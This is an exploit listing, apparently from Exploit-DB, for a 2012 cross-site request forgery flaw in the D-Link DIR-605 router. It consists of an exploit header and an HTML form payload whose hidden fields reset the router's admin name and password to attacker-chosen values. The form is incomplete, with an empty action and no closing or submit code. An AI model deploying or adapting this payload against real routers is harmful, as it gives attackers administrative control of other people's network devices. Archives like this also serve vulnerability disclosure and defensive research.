D-Link DIR-605 - CSRF Vulnerability

EDB-ID: 18638 CVE: N/A OSVDB-ID: 80549
Verified: Author: iqzer0 Published: 2012-03-21
Download Exploit: Source Raw Download Vulnerable App: N/A
# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthroized access to the device and post injections

<form name="bypass" action="
       <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="iqzer0" />
        <input type="hidden" name="admin_password1" value="bypass" />
        <input type="hidden" name="admin_password2" value="bypass" />